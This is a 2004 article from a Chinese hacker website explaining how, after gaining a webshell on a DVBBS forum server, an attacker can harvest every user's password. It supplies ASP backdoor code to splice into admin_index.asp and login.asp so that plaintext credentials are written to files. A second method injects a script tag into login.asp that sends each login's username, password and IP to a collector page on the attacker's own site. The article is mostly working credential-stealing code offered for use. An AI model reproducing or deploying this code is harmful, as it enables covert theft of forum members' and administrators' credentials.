| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 安全防御 >> 漏洞分析 >> 文章正文 用户登录 新用户注册

获得DVBBS的所有密码新方法    热     ★★★ 【字体：小 大】
获得DVBBS的所有密码新方法
作者：rain[918…    文章来源：CnXHacker.Net    点击数：    更新时间：2004-10-28
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样: 老办法: 修改admin_index.asp得到明文DVBBS后台密码 在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了rain.txt，里面就记录了明文密码 这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。 新办法： 方法一:login.asp中Case "chk"下: 　　　on error resume next 　　　dim rain 　　　set lP=server.CreateObject("Adodb.Stream") 　　　rain.Open 　　　rain.Type=2 　　　rain.CharSet="gb2312" 　　　rain.LoadFromFile server.mapPath("918.asp") 　　　rain.Position=lp.Size 　　　rain.writetext now&request("username")&"text:"&request("password")&chr(10) 　　　rain.SaveToFile server.mapPath("918.asp"),2 　　　rain.Close 　　　set rain=nothing 这样918.asp将获得全部登陆人的密码，时间和名字。 至于admin_index.asp你也可以加在这里只获得管理员的密码。 方法二:如果你有自己的网站: 建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp: <%@codepage=936%> <%Response.Expires=0 if request("k")="k" then%> <pre><!--#include file="918.asp"--> <%elseif request("n")<>"" and request("p")<>"" then 　　　on error resume next 　　　dim rain 　　　set rain=server.CreateObject("Adodb.Stream") 　　　rain.Open 　　　rain.Type=2 　　　rain.CharSet="gb2312" 　　　rain.LoadFromFile server.mapPath("918.asp") 　　　zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">" 　　　rain.Position=0 　　　rain.writetext now&"有大侠以名　"&request("n")&"　及密码　"&request("p")&"　试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh 　　　rain.SaveToFile server.mapPath("918.asp"),2 　　　rain.Close 　　　set rain=nothing end if%> 在login.asp那里插入一句: response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里 这下调用Adodb.Stream，几乎机子里有是有的，所以成功率要更高。
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 利用对方服务器漏洞远程注册DLL 下一篇文章： IE的IFRAME漏洞
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				SIDVault Simple_Bind 函数多 SIDVault Simple_Bind 函数多 特征被总结 恶意软件称谓首次 Advanced SQL Injection In  Cgogo获得信产部颁发移动搜索 安全组织称已修补HD-DVD和蓝 安全组织称已修复HD-DVD和蓝 中国反流氓软件联盟系列诉讼 McAfee推免费版SiteAdvisor安 美黑客称已破解HD DVD AACS加

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.